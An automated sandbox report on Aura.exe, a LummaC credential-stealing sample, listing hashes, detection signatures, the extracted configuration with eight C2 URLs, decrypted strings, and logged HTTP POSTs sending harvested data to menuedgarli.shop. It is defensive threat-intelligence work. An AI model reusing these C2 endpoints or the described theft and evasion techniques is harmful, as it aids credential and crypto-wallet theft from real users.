Edit tour

Windows Analysis Report
Aura.exe

Overview

General Information

Sample name:	Aura.exe
Analysis ID:	1636536
MD5:	777f258d5f2e3e78413027726b439fcc
SHA1:	483d6dd7641228fe0eec2a2ee3e5e86ad06ac189
SHA256:	0f0d6730745730414481cf9af3826a72776ed8b4daacd8a924b716f632652317
Tags:	exeLummaStealeruser-tcains1
Infos:

Detection

LummaC Stealer

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected LummaC Stealer

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected non-DNS traffic on DNS port

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

Aura.exe (PID: 7808 cmdline: "C:\Users\user\Desktop\Aura.exe" MD5: 777F258D5F2E3E78413027726B439FCC)

conhost.exe (PID: 7816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Aura.exe (PID: 7864 cmdline: "C:\Users\user\Desktop\Aura.exe" MD5: 777F258D5F2E3E78413027726B439FCC)

Aura.exe (PID: 7872 cmdline: "C:\Users\user\Desktop\Aura.exe" MD5: 777F258D5F2E3E78413027726B439FCC)

Aura.exe (PID: 7880 cmdline: "C:\Users\user\Desktop\Aura.exe" MD5: 777F258D5F2E3E78413027726B439FCC)

WerFault.exe (PID: 7972 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7808 -s 404 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Configuration

Threatname: LummaC

{"C2 url": ["menuedgarli.shop/AUIqn", "featureccus.shop/bdMAn", "mrodularmall.top/aNzS", "jowinjoinery.icu/bdWUa", "legenassedk.top/bdpWO", "htardwarehu.icu/Sbdsa", "cjlaspcorne.icu/DbIps", "bugildbett.top/bAuz"], "Build id": "f40c3ff962dcdb4f6bc6810b36e2f6fe9bd82b74fa7f6ffab0bacf7e"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000004.00000003.1340998626.00000000012B6000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000003.1344718805.00000000012B6000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000003.1282396896.00000000012B5000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.2438218367.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000004.00000003.1344787476.0000000001267000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000003.1345469435.0000000001267000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1257698483.00000000022E7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
Process Memory Space: Aura.exe PID: 7880	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Aura.exe PID: 7880	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
Click to see the 4 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
4.2.Aura.exe.400000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
4.2.Aura.exe.400000.0.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-12T21:42:14.212882+0100	2028371	3	Unknown Traffic	192.168.2.4	49712	149.154.167.99	443	TCP
2025-03-12T21:42:16.259138+0100	2028371	3	Unknown Traffic	192.168.2.4	49716	104.21.16.1	443	TCP
2025-03-12T21:42:17.889204+0100	2028371	3	Unknown Traffic	192.168.2.4	49717	104.21.16.1	443	TCP
2025-03-12T21:42:21.269526+0100	2028371	3	Unknown Traffic	192.168.2.4	49725	104.21.16.1	443	TCP
2025-03-12T21:42:23.977890+0100	2028371	3	Unknown Traffic	192.168.2.4	49727	104.21.16.1	443	TCP
2025-03-12T21:42:26.958833+0100	2028371	3	Unknown Traffic	192.168.2.4	49728	104.21.16.1	443	TCP
2025-03-12T21:42:30.036933+0100	2028371	3	Unknown Traffic	192.168.2.4	49731	104.21.16.1	443	TCP
2025-03-12T21:42:32.853666+0100	2028371	3	Unknown Traffic	192.168.2.4	49732	104.21.16.1	443	TCP
2025-03-12T21:42:36.274635+0100	2028371	3	Unknown Traffic	192.168.2.4	49733	104.21.16.1	443	TCP
2025-03-12T21:42:38.189687+0100	2028371	3	Unknown Traffic	192.168.2.4	49734	104.21.48.1	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: mrodularmall.top/aNzS	Avira URL Cloud: Label: malware
Source: https://featureccus.shop/bdMAn	Avira URL Cloud: Label: malware
Source: bugildbett.top/bAuz	Avira URL Cloud: Label: malware
Source: legenassedk.top/bdpWO	Avira URL Cloud: Label: malware
Source: https://menuedgarli.shop/AUIqn	Avira URL Cloud: Label: malware
Source: menuedgarli.shop/AUIqn	Avira URL Cloud: Label: malware
Source: https://menuedgarli.shop/au	Avira URL Cloud: Label: malware
Source: jowinjoinery.icu/bdWUa	Avira URL Cloud: Label: malware
Source: featureccus.shop/bdMAn	Avira URL Cloud: Label: malware
Source: htardwarehu.icu/Sbdsa	Avira URL Cloud: Label: malware
Source: https://menuedgarli.shop/	Avira URL Cloud: Label: malware
Source: https://mrodularmall.top/	Avira URL Cloud: Label: malware
Source: cjlaspcorne.icu/DbIps	Avira URL Cloud: Label: malware
Source: https://mrodularmall.top/aNzS	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000000.00000002.1257698483.00000000022E7000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: LummaC {"C2 url": ["menuedgarli.shop/AUIqn", "featureccus.shop/bdMAn", "mrodularmall.top/aNzS", "jowinjoinery.icu/bdWUa", "legenassedk.top/bdpWO", "htardwarehu.icu/Sbdsa", "cjlaspcorne.icu/DbIps", "bugildbett.top/bAuz"], "Build id": "f40c3ff962dcdb4f6bc6810b36e2f6fe9bd82b74fa7f6ffab0bacf7e"}

Multi AV Scanner detection for submitted file

Source: Aura.exe	Virustotal: Detection: 51%			Perma Link
Source: Aura.exe	ReversingLabs: Detection: 47%

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.1257698483.00000000022E7000.00000004.00000020.00020000.00000000.sdmp	String decryptor: menuedgarli.shop/AUIqn
Source: 00000000.00000002.1257698483.00000000022E7000.00000004.00000020.00020000.00000000.sdmp	String decryptor: featureccus.shop/bdMAn
Source: 00000000.00000002.1257698483.00000000022E7000.00000004.00000020.00020000.00000000.sdmp	String decryptor: mrodularmall.top/aNzS
Source: 00000000.00000002.1257698483.00000000022E7000.00000004.00000020.00020000.00000000.sdmp	String decryptor: jowinjoinery.icu/bdWUa
Source: 00000000.00000002.1257698483.00000000022E7000.00000004.00000020.00020000.00000000.sdmp	String decryptor: legenassedk.top/bdpWO
Source: 00000000.00000002.1257698483.00000000022E7000.00000004.00000020.00020000.00000000.sdmp	String decryptor: htardwarehu.icu/Sbdsa
Source: 00000000.00000002.1257698483.00000000022E7000.00000004.00000020.00020000.00000000.sdmp	String decryptor: cjlaspcorne.icu/DbIps
Source: 00000000.00000002.1257698483.00000000022E7000.00000004.00000020.00020000.00000000.sdmp	String decryptor: bugildbett.top/bAuz

Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_0041C582 CryptUnprotectData,CryptUnprotectData,	4_2_0041C582
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_0041EF24 CryptUnprotectData,	4_2_0041EF24
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4_2_0041C582 CryptUnprotectData,CryptUnprotectData,	4_2_0041C582

Source: Aura.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49725 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49727 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.4:49734 version: TLS 1.2

Source: Aura.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C5FCDE FindFirstFileExW,	0_2_00C5FCDE
Source: C:\Users\user\Desktop\Aura.exe	Code function: 0_2_00C5FD8F FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00C5FD8F
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C5FCDE FindFirstFileExW,	2_2_00C5FCDE
Source: C:\Users\user\Desktop\Aura.exe	Code function: 2_2_00C5FD8F FindFirstFileExW,FindNextFileW,FindClose,FindClose,	2_2_00C5FD8F

Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Comms	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\Packages	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local\CEF	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\Desktop\Aura.exe	File opened: C:\Users\user\.ms-ad	Jump to behavior

Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h	4_2_00445140
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-000000D6h]	4_2_0044E900
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then lea eax, dword ptr [esp+4Ch]	4_2_0040FA70
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then cmp word ptr [edi+ebx], 0000h	4_2_0044D290
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then jmp ecx	4_2_0044B3D8
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then mov esi, dword ptr [ecx+eax+3Ch]	4_2_00448BF0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+50h]	4_2_00445380
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then movzx eax, byte ptr [esp+ecx+50h]	4_2_00445380
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then mov byte ptr [edi], al	4_2_00438460
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then movzx ecx, byte ptr [ebp+eax+3A919412h]	4_2_0044B473
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], F7D6D3F6h	4_2_0044E5E0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+163E6BF0h]	4_2_0042CE60
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+000002E2h]	4_2_0041EF24
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then mov word ptr [eax], cx	4_2_0041EF24
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+0000009Eh]	4_2_00420002
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then jmp eax	4_2_0044C023
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 743EDB10h	4_2_0044D830
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then mov ecx, edx	4_2_0044C0DB
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-27865B7Bh]	4_2_004258F0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then movzx eax, byte ptr [esp+edx-74h]	4_2_0040C890
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then movzx eax, byte ptr [esp+ecx-00000086h]	4_2_0044D0A0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-1Ah]	4_2_0041E0A8
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-1Ah]	4_2_0041E0A8
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+4AAE1442h]	4_2_0042F16A
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+24h]	4_2_0041290A
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then mov word ptr [eax], cx	4_2_0041290A
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then mov word ptr [eax], cx	4_2_0041290A
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+50h]	4_2_00428110
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h	4_2_00428110
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then mov word ptr [eax], dx	4_2_00428110
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then movzx esi, byte ptr [edi+eax+79014E66h]	4_2_0044B1CE
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	4_2_004209D2
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then cmp dword ptr [edi+ecx*8], 744E5843h	4_2_004491D0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+6C5F5974h]	4_2_004491D0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then mov byte ptr [esi], cl	4_2_0043924D
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then mov dword ptr [esp], edi	4_2_0043924D
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	4_2_00434A70
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+791B2068h]	4_2_0042DA00
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then mov ebp, eax	4_2_00408A20
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+32AD0A60h]	4_2_0042FAD0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+4AAE143Eh]	4_2_004462D0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	4_2_00442AD0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	4_2_00433AFF
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then movzx edi, byte ptr [esp+edx+0Ch]	4_2_00424A82
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-000000D6h]	4_2_0044EA80
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+esi+0Ch]	4_2_00432A87
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then cmp word ptr [edx+eax+02h], 0000h	4_2_00432A87
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h	4_2_00432A87
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax-33692858h]	4_2_00437A84
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax-33692858h]	4_2_00437A8A
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	4_2_0040A290
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	4_2_0040A290
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+000000C8h]	4_2_00411290
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+02h]	4_2_0042A340
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 7A542AABh	4_2_0044DB50
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+20h]	4_2_0041EB60
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	4_2_0041EB60
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then mov ecx, edx	4_2_004333C0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then mov ecx, edx	4_2_004333C0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then mov word ptr [eax], cx	4_2_004333C0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then mov dword ptr [esp], ecx	4_2_004313DA
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx-5ECA2E42h]	4_2_00411C2D
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+791B2068h]	4_2_0042DC30
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then jmp eax	4_2_00438550
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then mov byte ptr [edi], al	4_2_00436D66
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then mov dword ptr [esp+28h], F3F2F558h	4_2_00436D66
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then movzx edi, byte ptr [esp+edx+0Ch]	4_2_00424A82
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then jmp eax	4_2_00438580
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then mov ebp, eax	4_2_00431D9C
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax]	4_2_00446DBF
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+0Ah]	4_2_00446DBF
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 656D2358h	4_2_0041DE50
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then mov byte ptr [esi], al	4_2_00423D5B
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then mov byte ptr [esi], al	4_2_00423D5B
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then mov word ptr [eax], cx	4_2_00429E30
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then jmp eax	4_2_0043863F
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then jmp eax	4_2_004386C0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then mov edi, dword ptr [ebp-20h]	4_2_0044A6A9
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then movzx ebx, byte ptr [edx+esi]	4_2_0044BEB5
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then movzx edx, byte ptr [esi+ecx+5EDC1802h]	4_2_0042D6BB
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then jmp ecx	4_2_0044B746
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-1Eh]	4_2_00448F40
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	4_2_00402770
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then cmp word ptr [edx+eax+02h], 0000h	4_2_00432F70
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h	4_2_00432F70
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	4_2_00433F74
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then cmp word ptr [edx+eax+02h], 0000h	4_2_00432F08
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 93A82FD1h	4_2_00432F08
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	4_2_0041B7D0
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+4AAE143Eh]	4_2_00446790
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then jmp eax	4_2_0044BFA8
Source: C:\Users\user\Desktop\Aura.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-3BFF5478h]	4_2_004297B0

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: menuedgarli.shop/AUIqn
Source: Malware configuration extractor	URLs: featureccus.shop/bdMAn
Source: Malware configuration extractor	URLs: mrodularmall.top/aNzS
Source: Malware configuration extractor	URLs: jowinjoinery.icu/bdWUa
Source: Malware configuration extractor	URLs: legenassedk.top/bdpWO
Source: Malware configuration extractor	URLs: htardwarehu.icu/Sbdsa
Source: Malware configuration extractor	URLs: cjlaspcorne.icu/DbIps
Source: Malware configuration extractor	URLs: bugildbett.top/bAuz

Source: global traffic

TCP traffic: 192.168.2.4:57852 -> 162.159.36.2:53

Source: global traffic

HTTP traffic detected: GET /asdawfq HTTP/1.1Connection: Keep-AliveHost: t.me

Source: Joe Sandbox View	IP Address: 104.21.48.1 104.21.48.1
Source: Joe Sandbox View	IP Address: 104.21.48.1 104.21.48.1
Source: Joe Sandbox View	IP Address: 104.21.16.1 104.21.16.1
Source: Joe Sandbox View	IP Address: 104.21.16.1 104.21.16.1

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49727 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 104.21.48.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49728 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49717 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49716 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49725 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49712 -> 149.154.167.99:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 104.21.16.1:443

Source: global traffic	HTTP traffic detected: POST /AUIqn HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 65Host: menuedgarli.shop
Source: global traffic	HTTP traffic detected: POST /AUIqn HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=mq2i7necmw1qJv68YaUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19635Host: menuedgarli.shop
Source: global traffic	HTTP traffic detected: POST /AUIqn HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=9nPgp61TGUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8747Host: menuedgarli.shop
Source: global traffic	HTTP traffic detected: POST /AUIqn HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=dG9D2azB9oob6User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20420Host: menuedgarli.shop
Source: global traffic	HTTP traffic detected: POST /AUIqn HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=7Dmdglwu1e80User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2720Host: menuedgarli.shop
Source: global traffic	HTTP traffic detected: POST /AUIqn HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=e195wUQg5Q2PJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 550893Host: menuedgarli.shop
Source: global traffic	HTTP traffic detected: POST /aNzS HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 103Host: mrodularmall.top

Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /asdawfq HTTP/1.1Connection: Keep-AliveHost: t.me

Source: global traffic	DNS traffic detected: DNS query: t.me
Source: global traffic	DNS traffic detected: DNS query: menuedgarli.shop
Source: global traffic	DNS traffic detected: DNS query: featureccus.shop
Source: global traffic	DNS traffic detected: DNS query: mrodularmall.top

Source: unknown

